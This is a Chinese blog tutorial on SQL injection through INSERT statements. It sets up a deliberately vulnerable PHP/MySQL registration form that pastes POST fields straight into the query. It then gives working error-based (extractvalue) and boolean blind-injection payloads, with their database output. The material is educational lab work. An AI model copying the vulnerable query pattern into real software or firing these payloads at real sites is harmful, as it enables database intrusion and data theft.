
 <!DOCTYPE HTML>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
  
    <title>insert 注入 | </title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="daiker">
    

    
    <meta name="description" content="0x00 前言我们最常见的注入就是在查询中注入，那你有没有遇到过插入的时候也能注入。插入中最常见的就是注册用户或者撰写文章。当然，注册用户的时候可能会考虑去数据库查询下有没有这个人，这涉及到查询时候的注入，我们今天忽略这种注入。 0x01 例子下面我给出一个简单的例子，基于php+mysql的。方便实验12345678mysql语句create database sqli;use sqli;cre">
<meta name="keywords" content="Web,注入">
<meta property="og:type" content="article">
<meta property="og:title" content="insert 注入">
<meta property="og:url" content="http://www.daiker.com.cn/2017/05/09/insert 注入/index.html">
<meta property="og:site_name">
<meta property="og:description" content="0x00 前言我们最常见的注入就是在查询中注入，那你有没有遇到过插入的时候也能注入。插入中最常见的就是注册用户或者撰写文章。当然，注册用户的时候可能会考虑去数据库查询下有没有这个人，这涉及到查询时候的注入，我们今天忽略这种注入。 0x01 例子下面我给出一个简单的例子，基于php+mysql的。方便实验12345678mysql语句create database sqli;use sqli;cre">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/5443560-e0ee8fd70dd992ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2018-02-21T04:07:40.965Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="insert 注入">
<meta name="twitter:description" content="0x00 前言我们最常见的注入就是在查询中注入，那你有没有遇到过插入的时候也能注入。插入中最常见的就是注册用户或者撰写文章。当然，注册用户的时候可能会考虑去数据库查询下有没有这个人，这涉及到查询时候的注入，我们今天忽略这种注入。 0x01 例子下面我给出一个简单的例子，基于php+mysql的。方便实验12345678mysql语句create database sqli;use sqli;cre">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/5443560-e0ee8fd70dd992ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta name="twitter:creator" content="@daikersec">

    
    <link rel="alternative" href="/atom.xml" title="" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/favicon.png">
    
    
    <link rel="apple-touch-icon" href="/img/jacman.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/jacman.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>

  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.png" alt="" title=""/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title=""></a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">首页</a></li>
					
						<li><a href="/archives">归档</a></li>
					
						<li><a href="/tags">标签</a></li>
					
						<li><a href="/categories">分类</a></li>
					
					<li>
 					
						<form class="search" action="http://zhannei.baidu.com/cse/search" target="_blank">
							<label>Search</label>
						<input name="s" type="hidden" value= 6197743525332190000 ><input type="text" name="q" size="30" placeholder="Search"><br>
						</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
  
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2017/05/09/insert 注入/" title="insert 注入" itemprop="url">insert 注入</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="daiker" target="_blank" itemprop="author">daiker</a>
		
  <p class="article-time">
    <time datetime="2017-05-09T14:42:34.000Z" itemprop="datePublished"> Published 2017-05-09</time>
    
  </p>
</header>
	<div class="article-content">
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		
			<ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text"><a href="#0x00-&#x524D;&#x8A00;" class="headerlink" title="0x00 &#x524D;&#x8A00;"></a>0x00 &#x524D;&#x8A00;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-例子"><span class="toc-number">2.</span> <span class="toc-text"><a href="#0x01-&#x4F8B;&#x5B50;" class="headerlink" title="0x01 &#x4F8B;&#x5B50;"></a>0x01 &#x4F8B;&#x5B50;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02分析注入"><span class="toc-number">3.</span> <span class="toc-text"><a href="#0x02&#x5206;&#x6790;&#x6CE8;&#x5165;" class="headerlink" title="0x02&#x5206;&#x6790;&#x6CE8;&#x5165;"></a>0x02&#x5206;&#x6790;&#x6CE8;&#x5165;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03报错注入"><span class="toc-number">4.</span> <span class="toc-text"><a href="#0x03&#x62A5;&#x9519;&#x6CE8;&#x5165;" class="headerlink" title="0x03&#x62A5;&#x9519;&#x6CE8;&#x5165;"></a>0x03&#x62A5;&#x9519;&#x6CE8;&#x5165;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-盲注"><span class="toc-number">5.</span> <span class="toc-text"><a href="#0x04-&#x76F2;&#x6CE8;" class="headerlink" title="0x04 &#x76F2;&#x6CE8;"></a>0x04 &#x76F2;&#x6CE8;</span></a></li></ol>
		
		</div>
		
		<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>我们最常见的注入就是在查询中注入，那你有没有遇到过插入的时候也能注入。插入中最常见的就是注册用户或者撰写文章。当然，注册用户的时候可能会考虑去数据库查询下有没有这个人，这涉及到查询时候的注入，我们今天忽略这种注入。</p>
<h2 id="0x01-例子"><a href="#0x01-例子" class="headerlink" title="0x01 例子"></a>0x01 例子</h2><p>下面我给出一个简单的例子，基于php+mysql的。方便实验<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql语句</span><br><span class="line">create database sqli;</span><br><span class="line">use sqli;</span><br><span class="line">create table user(</span><br><span class="line">name varchar(40),</span><br><span class="line">email  varchar(20),</span><br><span class="line">qq varchar(20)</span><br><span class="line">);</span><br></pre></td></tr></table></figure></p>
<a id="more"></a>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">前端</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge,chrome=1&quot;&gt;</span><br><span class="line">&lt;title&gt;Examples&lt;/title&gt;</span><br><span class="line">&lt;meta name=&quot;description&quot; content=&quot;&quot;&gt;</span><br><span class="line">&lt;meta name=&quot;keywords&quot; content=&quot;&quot;&gt;</span><br><span class="line">&lt;link href=&quot;&quot; rel=&quot;stylesheet&quot;&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">   &lt;form action=&quot;register.php&quot; method=&quot;post&quot;&gt;</span><br><span class="line">        Name: &lt;input type=&quot;text&quot; name=&quot;name&quot; /&gt;</span><br><span class="line">        Email: &lt;input type=&quot;text&quot; name=&quot;email&quot; /&gt;</span><br><span class="line">        QQ: &lt;input type=&quot;text&quot; name=&quot;qq&quot; /&gt;</span><br><span class="line">        &lt;input type=&quot;submit&quot; /&gt;</span><br><span class="line">    &lt;/form&gt;</span><br><span class="line"></span><br><span class="line">   &lt;/form&gt; </span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">后端</span><br><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker</span><br><span class="line"> * @date    2017-05-09 20:08:53</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line">$conn=mysql_connect(&apos;127.0.0.1&apos;, &apos;root&apos;, &apos;root&apos;);</span><br><span class="line">if(!$conn)&#123;</span><br><span class="line">    die(&quot;mysql connect error&quot;);</span><br><span class="line">&#125;</span><br><span class="line">mysql_select_db(&quot;sqli&quot;,$conn);</span><br><span class="line"></span><br><span class="line">$sql=&quot;insert into user(name,email,qq) values (&apos;$_POST[name]&apos;,&apos;$_POST[email]&apos;,&apos;$_POST[qq]&apos;)&quot;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$result=mysql_query($sql,$conn);</span><br><span class="line">print_r(mysql_error());</span><br><span class="line">if(!$result)&#123;</span><br><span class="line">    die(&quot;error&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo &quot;Yes&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>效果</p>
<p><img src="http://upload-images.jianshu.io/upload_images/5443560-e0ee8fd70dd992ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h2 id="0x02分析注入"><a href="#0x02分析注入" class="headerlink" title="0x02分析注入"></a>0x02分析注入</h2><p>我们常见的注入有4种</p>
<ul>
<li>报错注入</li>
<li>联合查询</li>
<li>盲注</li>
<li>堆叠查询<br>联合查询前后都要<code>SELECT</code>,排除<br>堆叠查询，mysql不支持排除，那就只剩下报错注入和盲注。<br>报错注入条件比较苛刻，需要显示报错信息.</li>
</ul>
<h2 id="0x03报错注入"><a href="#0x03报错注入" class="headerlink" title="0x03报错注入"></a>0x03报错注入</h2><p>报错注入条件比较苛刻，需要显示报错信息.<br>报错注入，那就要能报错，可以用<code>floor()</code>,<code>updatexml()</code>,<code>extractvalue()</code>。<br>这里以<code>extractvalue()</code>为例<br>首先闭合，有两种方法,内联式和注释法<br>内联式的话,就是加and ‘1’=’1来闭合后面的引号<br>注释式的话，就是够着1’,’’,’’)#这样的语句<br>然后利用extractvalue报错<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=ee&apos; and extractvalue(1,&apos; &apos;) and &apos;1&apos;=&apos;1 &amp;email=aa&amp;qq=aa</span><br></pre></td></tr></table></figure></p>
<p>报错了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">XPATH syntax error: &apos;&apos;</span><br></pre></td></tr></table></figure></p>
<p>然后修改`extractvalue()的第二个值以此提取数据<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=ee&apos; and extractvalue(1,concat(0x5e5e5e,database(),0x5e5e5e)) and &apos;1&apos;=&apos;1 &amp;email=aa&amp;qq=aa</span><br></pre></td></tr></table></figure></p>
<p>0x5e5e5e据^^^为方便观看<br>爆出数据库<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">XPATH syntax error: &apos;^^^sqli^^^&apos;</span><br></pre></td></tr></table></figure></p>
<h2 id="0x04-盲注"><a href="#0x04-盲注" class="headerlink" title="0x04 盲注"></a>0x04 盲注</h2><blockquote>
<p>实验前必须删除上面语句的<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">因为报错注入要求必须报错，但是一旦不显示错误，就比较困难了。</span><br><span class="line">如果是布尔型盲注，关键是让返回的结果不一样，也就是让语句不能正确执行，这里的话，我利用if((1=1),a,b)，a和b会导致整个语句返回的结果不同，那我们执行的语句不久可以放在(1=1)这里，但是怎么构造呢?</span><br><span class="line">最开始想的是用报错注入那几个函数,比如`extractvalue`，但是无论如何都不能执行，后来本地调试了一下</span><br><span class="line"></span><br><span class="line">![图片.png](http://upload-images.jianshu.io/upload_images/5443560-23d1f214772355dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">大致可以推出if语句后面两个参数都是会执行的，不管有没有被选中，但是谁被选中，就把执行的结果返回。</span><br><span class="line">后来讲过大佬点拨，发现了一个语句。</span><br></pre></td></tr></table></figure></p>
</blockquote>
<p>select 1 from information_schema.tables<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">这个语句的话执行是不会报错的</span><br><span class="line"></span><br><span class="line">![图片.png](http://upload-images.jianshu.io/upload_images/5443560-542b9c8dc59abf8b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">但是注意看图，会发现，他返回的结果特别多。没错，就是这一点，</span><br><span class="line">多行结果跟1 and 会报错。</span><br><span class="line"></span><br><span class="line">![图片.png](http://upload-images.jianshu.io/upload_images/5443560-0d199c72402c0b3f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line">最后构造语句</span><br></pre></td></tr></table></figure></p>
<p>name=ee’ and if((A),1,(select 1 from information_schema.tables)) &amp;email=aa&amp;qq=a<br>```<br>其中A是我们自己构造的语句，参见盲注的文章自己构造</p>
<p>但是有一点必须强调，这样的后果就是数据库会残留下大量语句。尽量不要用这招</p>
  
	</div>
		<footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/注入/">注入</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/Web/">Web</a><a href="/tags/注入/">注入</a>
  </div>

</div>



	<div class="article-share" id="share">
	
	  <div data-url="http://www.daiker.com.cn/2017/05/09/insert 注入/" data-title="insert 注入 | " data-tsina="5688081717" class="share clearfix">
	  </div>
	
	</div>


</footer>

   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2017/07/09/php危险函数总结(随时补充)/" title="PHP危险函数总结(随时补充)">
  <strong>上一篇：</strong><br/>
  <span>
  PHP危险函数总结(随时补充)</span>
</a>
</div>


<div class="next">
<a href="/2017/05/04/CTF中代码审计小trick(未完)/"  title="CTF中代码审计小trick(未完)">
 <strong>下一篇：</strong><br/> 
 <span>CTF中代码审计小trick(未完)
</span>
</a>
</div>

</nav>

	
<section id="comments" class="comment">
	<div class="ds-thread" data-thread-key="2017/05/09/insert 注入/" data-title="insert 注入" data-url="http://www.daiker.com.cn/2017/05/09/insert 注入/"></div>
</section>




</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
 
 <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text"><a href="#0x00-&#x524D;&#x8A00;" class="headerlink" title="0x00 &#x524D;&#x8A00;"></a>0x00 &#x524D;&#x8A00;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-例子"><span class="toc-number">2.</span> <span class="toc-text"><a href="#0x01-&#x4F8B;&#x5B50;" class="headerlink" title="0x01 &#x4F8B;&#x5B50;"></a>0x01 &#x4F8B;&#x5B50;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02分析注入"><span class="toc-number">3.</span> <span class="toc-text"><a href="#0x02&#x5206;&#x6790;&#x6CE8;&#x5165;" class="headerlink" title="0x02&#x5206;&#x6790;&#x6CE8;&#x5165;"></a>0x02&#x5206;&#x6790;&#x6CE8;&#x5165;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03报错注入"><span class="toc-number">4.</span> <span class="toc-text"><a href="#0x03&#x62A5;&#x9519;&#x6CE8;&#x5165;" class="headerlink" title="0x03&#x62A5;&#x9519;&#x6CE8;&#x5165;"></a>0x03&#x62A5;&#x9519;&#x6CE8;&#x5165;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-盲注"><span class="toc-number">5.</span> <span class="toc-text"><a href="#0x04-&#x76F2;&#x6CE8;" class="headerlink" title="0x04 &#x76F2;&#x6CE8;"></a>0x04 &#x76F2;&#x6CE8;</span></a></li></ol>
 
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  
<div class="github-card">
<p class="asidetitle">Github Card</p>
<div class="github-card" data-github="daikersec" data-theme="medium"></div>
<script type="text/javascript" src="//cdn.jsdelivr.net/github-cards/latest/widget.js" ></script>
</div>



  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/ctf/" title="ctf">ctf<sup>5</sup></a></li>
		  
		
		  
			<li><a href="/categories/注入/" title="注入">注入<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/渗透测试/" title="渗透测试">渗透测试<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/漏洞研究/" title="漏洞研究">漏洞研究<sup>1</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/Web/" title="Web">Web<sup>8</sup></a></li>
			
		
			
				<li><a href="/tags/ctf/" title="ctf">ctf<sup>6</sup></a></li>
			
		
			
				<li><a href="/tags/hackinglab/" title="hackinglab">hackinglab<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/漏洞研究/" title="漏洞研究">漏洞研究<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/代码审计/" title="代码审计">代码审计<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/php/" title="php">php<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/注入/" title="注入">注入<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/渗透/" title="渗透">渗透<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/提权/" title="提权">提权<sup>1</sup></a></li>
			
		
		</ul>
</div>


  
  <div class="archiveslist">
    <p class="asidetitle"><a href="/archives">Archives</a></p>
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/12/">December 2017</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">July 2017</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/05/">May 2017</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/04/">April 2017</a><span class="archive-list-count">3</span></li></ul>
  </div>


  <div class="rsspart">
	<a href="/atom.xml" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<div class="social-font" class="clearfix">
		
		<a href="http://weibo.com/daikersec" target="_blank" class="icon-weibo" title="微博"></a>
		
		
		<a href="https://github.com/daikersec" target="_blank" class="icon-github" title="github"></a>
		
		
		
		<a href="https://twitter.com/daikersec" target="_blank" class="icon-twitter" title="twitter"></a>
		
		
		
		
		
		
		
		<a href="mailto:daikersec@gmail.com" target="_blank" class="icon-email" title="Email Me"></a>
		
	</div>
			
		

		<p class="copyright">
		Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/wuchong/jacman" target="_blank" title="Jacman">Jacman</a> © 2018 
		
		<a href="/about" target="_blank" title="daiker">daiker</a>
		
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>



<script type="text/javascript">
  var duoshuoQuery = {short_name:"嘟嘟MD"};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0] 
    || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
</script> 









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?2a1c7e2856fa901812e41edbfcef616e";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>



<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="Back to Top"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true
    }
  });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
